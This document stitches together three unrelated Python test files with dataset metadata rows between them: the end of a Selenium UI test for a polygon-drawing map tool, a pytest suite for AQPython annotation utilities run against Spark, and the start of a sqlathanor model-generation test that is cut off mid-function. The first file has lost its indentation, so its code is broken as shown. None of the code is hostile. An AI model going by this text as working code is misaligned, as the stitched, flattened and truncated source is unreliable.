element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
#elements = driver.find_elements_by_xpath('//a[@href="Skogcollapse"]')
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# Draw new polygon
action.move_by_offset(50, 50)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Stad")
# Push button add
driver.find_element_by_id("addClassName").click()
# Select dropdown
select = Select(driver.find_element_by_id("classes"))
# select by visible text
select.select_by_visible_text('Skog')
print("Select value Skog: " + select.first_selected_option.text)
assert(select.first_selected_option.text == "Skog")
# select by visible text
select.select_by_visible_text('Stad')
print("Select value Stad: " + select.first_selected_option.text)
assert(select.first_selected_option.text == "Stad")
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
#elements = driver.find_elements_by_xpath('//a[@href="Skogcollapse"]')
elements = driver.find_elements_by_id("Stadcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
def test_clear_map(self):
print("************ Test clear map ****************")
sleeptime = 0
driver = self.driver
driver.get(path)
driver.maximize_window()
driver.find_element_by_id("btnOpenSidebar").click()
#element = driver.find_element_by_id("downloadPolygons")
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# From wherever the mouse is, move by a fixed offset into the browser's map area and start clicking out a polygon
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Push button close -> Dialog close and polygon is gone
driver.find_element_by_id("closePolygonModal").click()
# Search for new element
elements = driver.find_elements_by_xpath('//div[@class="panel-heading"]')
print("Number of elements at close: " + str(len(elements)))
assert(len(elements) == 0)
# Draw new polygon
action.move_by_offset(0, 0)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(2)
# Click clear map
driver.find_element_by_id("clearMapButton").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of class: " + str(len(elements)))
assert(len(elements) == 1)
elements = driver.find_elements_by_xpath('//button[@class="polygonRemoveButton btn btn-warning"]')
print("Number of polygons: " + str(len(elements)))
assert(len(elements) == 0)
def test_download_polygons(self):
print("************ Test download polygons ****************")
driver = self.driver
driver.get(path)
driver.maximize_window()
sleeptime = 0
# Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
# From wherever the mouse is, move by a fixed offset into the browser's map area and start clicking out a polygon
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
action.click().perform()
time.sleep(1)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(1)
# Push download button
driver.find_element_by_id("downloadPolygons").click()
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding filename
element = driver.find_element_by_id("geoJsonFileName")
element.clear()
element.send_keys("Test_download")
time.sleep(1)
# Click on close
driver.find_element_by_id("btnClosePolygonDownload").click()
time.sleep(1)
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(1)
# Push download button
driver.find_element_by_id("downloadPolygons").click()
time.sleep(1)
# Check if input is the same
element = driver.find_element_by_id("geoJsonFileName")
print("Input text: " + element.get_attribute('value'))
assert(element.get_attribute('value') == "Test_download")
# Push save file
driver.find_element_by_id("savePolygonsBtn").click()
time.sleep(1)
# TODO Check if savefile dialog is shown
time.sleep(sleeptime)
#assert(element.first_selected_option.text == "adagrad")
def test_attributes(self):
print("************ Test attributes ****************")
sleeptime = 1
driver = self.driver
driver.get(path)
driver.maximize_window()
# Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Check length of attribute inputLists
elements = driver.find_elements_by_xpath('//div[@class="col-12 attributeListDiv"]')
print("Number of elements: " + str(len(elements)))
assert(len(elements) == 0)
# From wherever the mouse is, move by a fixed offset into the browser's map area and start clicking out a polygon
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Adding training area
element = driver.find_element_by_id("checkTrainPolygon")
element.click()
print("Training checkbox is checked: " + str(element.is_selected()))
assert(element.is_selected())
# Push save polygon
driver.find_element_by_id("savePolygon").click()
time.sleep(sleeptime)
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Open attributes
driver.find_element_by_id("displayAttributesButton").click()
time.sleep(sleeptime)
#Check length of attribute inputLists
elements = driver.find_elements_by_xpath('//div[@class="col-12 attributeListDiv"]')
print("Number of elements: " + str(len(elements)))
assert(len(elements) == 23)
#Check all attributes
#element = driver.find_element_by_id("checkboxAllAttributes")
element = driver.find_element_by_class_name("attributesAllCheckbox")
element.click()
time.sleep(sleeptime)
print("Attribute mastercheckbox is checked: " + str(element.is_selected()))
assert(element.is_selected())
driver.find_element_by_id("btnSaveAttributes").click()
time.sleep(sleeptime)
def test_networksettings_download(self):
print("************ Test download networksettings ****************")
driver = self.driver
driver.get(path)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Add layers
driver.find_element_by_id("openAddLayerModal").click()
time.sleep(1)
driver.find_element_by_id("units").send_keys("2")
driver.find_element_by_id("addLayer").click()
#Set epochs
element = driver.find_element_by_id("epochsChoice")
element.clear()
element.send_keys("10")
#Set Learning Rate
element = driver.find_element_by_id("learningRate")
element.clear()
element.send_keys("0.1")
#Set loss Choice
#element = driver.find_element_by_id("lossChoice")
#element.clear()
#element.send_keys("SeleniumTest")
#Set Optimizer
element = Select(driver.find_element_by_id('optimizerChoice'))
element.select_by_visible_text("adagrad")
#Download settings
driver.find_element_by_id("saveNetwork").click()
time.sleep(1)
driver.find_element_by_id("jsonFileName").send_keys("seleniumTest")
driver.find_element_by_id("btnSaveNetworkModal").click()
time.sleep(2)
def tearDown(self):
self.driver.quit()
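# A minimal sketch of a reusable click-at-offset helper that could replace the
# repeated ActionChains blocks above; `click_offset` is a hypothetical name
# introduced here for illustration only.
def click_offset(driver, dx, dy, pause=0):
    """Move the mouse by (dx, dy) from its current position, click, and optionally pause."""
    action = ActionChains(driver)
    action.move_by_offset(dx, dy)
    action.click().perform()
    if pause:
        time.sleep(pause)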
if __name__ == "__main__":
unittest.main()
| 35.285992 | 106 | 0.627447 | 2,066 | 18,137 | 5.315586 | 0.099226 | 0.073757 | 0.108359 | 0.121107 | 0.830632 | 0.801402 | 0.774085 | 0.751594 | 0.748953 | 0.695046 | 0 | 0.01136 | 0.247726 | 18,137 | 513 | 107 | 35.354776 | 0.793536 | 0.122236 | 0 | 0.767584 | 0 | 0 | 0.153069 | 0.025259 | 0 | 0 | 0 | 0.001949 | 0.094801 | 1 | 0.027523 | false | 0 | 0.027523 | 0 | 0.058104 | 0.116208 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67146c2b7b35337bff4d0e1a5422676bbf64f3cf | 15,807 | py | Python | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 4 | 2019-10-15T08:21:00.000Z | 2020-06-22T14:58:57.000Z | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T14:51:15.000Z | 2019-09-17T14:51:15.000Z | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 1 | 2019-10-29T14:27:12.000Z | 2019-10-29T14:27:12.000Z | # -*- coding: utf-8 -*-
import os  # used below for the /tmp cleanup in setUpClass
import unittest
from AQPython.Utilities import *
from AQPython.Query import *
import pyspark
from pyspark.sql import Row
class UtilitiesTestSuite(unittest.TestCase):
@classmethod
def setUpClass(cls):
# The test methods below reference `spark` directly, so keep the session at module scope.
global spark
spark = pyspark.sql.SparkSession.builder \
.getOrCreate()
spark.conf.set("spark.sql.shuffle.partitions",4)
if os.path.exists("/tmp/S0022314X13001777"):
os.remove("/tmp/S0022314X13001777")
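# Note: assertEquals (used throughout this suite) is a deprecated alias of
# unittest's assertEqual; it still works but emits a DeprecationWarning on
# modern Python versions.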
# Test GetAQAnnotations count
def test_Utilities1(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
self.assertEquals(4066, annots.count())
# Test GetAQAnnotations annotation
def test_Utilities2(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'pos': 'jj', 'orig': 'Sylow'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations property wildcard
def test_Utilities3(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'JJ', 'orig': 'Sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations lower case wildcard
def test_Utilities4(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"],
["*"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'jj', 'orig': 'sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations url decode wildcard
def test_Utilities5(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"],
[],
['*"']) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'JJ', 'orig': 'Sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetCATAnnotations count
def test_Utilities6(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["orig", "lemma", "pos"],["orig", "lemma"])
self.assertEquals(4066, catAnnots.count())
# Test GetCATAnnotations annotation
def test_Utilities7(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["orig", "lemma", "pos"],["orig", "lemma"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test GetCATAnnotations property wildcard
def test_Utilities8(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["*"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test GetCATAnnotations encode wildcard
def test_Utilities9(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["*"],["*"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test Hydrate missing annotation file
def test_Utilities10(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence").limit(1)
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/junk/")
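# Hydrating against a directory with no matching string file is expected to
# leave the text property absent (properties={}) rather than raise.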
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
#result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1, properties={})
#expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1)
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
# Test Hydrate sentence
def test_Utilities11(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/")
hydratedAnnots.count()
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1, properties={'text': 'Sylow p-groups of polynomial permutations on the integers mod'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test Hydrate sentence with excludes
def test_Utilities12(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/")
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[8]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=20490, endOffset=20777, annotId=256, properties={'excludes': '2872,om,mml:math,20501,20510|2894,om,mml:math,20540,20546|2907,om,mml:math,20586,20590|2913,om,mml:math,20627,20630|2923,om,mml:math,20645,20651|2933,om,mml:math,20718,20721', 'text': 'A function arising from a polynomial in or, equivalently, from a polynomial in , is called a polynomial function on . We denote by the monoid with respect to composition of polynomial functions on . By monoid, we mean semigroup with an identity element.'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test Hydrate sentence without excludes
def test_Utilities13(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/",False)
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[8]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=20490, endOffset=20777, annotId=256, properties={'excludes': '2872,om,mml:math,20501,20510|2894,om,mml:math,20540,20546|2907,om,mml:math,20586,20590|2913,om,mml:math,20627,20630|2923,om,mml:math,20645,20651|2933,om,mml:math,20718,20721', 'text': 'A function g:Zpn→Zpn arising from a polynomial in Zpn[x] or, equivalently, from a polynomial in Z[x], is called a polynomial function on Zpn. We denote by (Fn,∘) the monoid with respect to composition of polynomial functions on Zpn. By monoid, we mean semigroup with an identity element.'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties) | 64.782787 | 636 | 0.626431 | 1,474 | 15,807 | 6.710312 | 0.122795 | 0.126175 | 0.169043 | 0.040744 | 0.90092 | 0.891113 | 0.878981 | 0.874937 | 0.868466 | 0.868466 | 0 | 0.047839 | 0.23167 | 15,807 | 244 | 637 | 64.782787 | 0.766406 | 0.045613 | 0 | 0.769231 | 0 | 0.020513 | 0.220372 | 0.061314 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.071795 | false | 0 | 0.025641 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6753e8c9cbe788558875ef42271d3641d5344181 | 36,534 | py | Python | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 101 | 2018-07-21T00:20:59.000Z | 2022-02-09T21:33:09.000Z | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 85 | 2018-06-16T02:15:08.000Z | 2022-02-24T14:57:24.000Z | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 6 | 2018-07-25T09:51:02.000Z | 2022-02-24T14:04:27.000Z | # -*- coding: utf-8 -*-
"""
***********************************
tests.test_model_generation
***********************************
Tests for functions which programmatically generate declarative models.
"""
from datetime import datetime
import pytest
import simplejson as json
import yaml
from sqlalchemy.types import Integer, Text, Float, DateTime, Date, Time, Boolean
from validator_collection import checkers
from sqlathanor.declarative import generate_model_from_dict, generate_model_from_json, \
generate_model_from_yaml, generate_model_from_csv
from sqlathanor.attributes import AttributeConfiguration
from sqlathanor.errors import UnsupportedValueTypeError, CSVStructureError
from tests.fixtures import check_input_file, input_files
# pylint: disable=line-too-long
def test_func():
pass
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2'],
'callable1': test_func
}, 'test_table', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
])
def test_generate_model_from_dict(input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
if error:
with pytest.raises(error):
result = generate_model_from_dict(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_dict(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
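# A minimal usage sketch of generate_model_from_dict, mirroring the API
# exercised by the parametrized cases above; the sample data, table name, and
# helper name are illustrative only (each generated model needs a unique
# tablename).
def _example_generated_model():
    sample = {'id': 1, 'label': 'example'}
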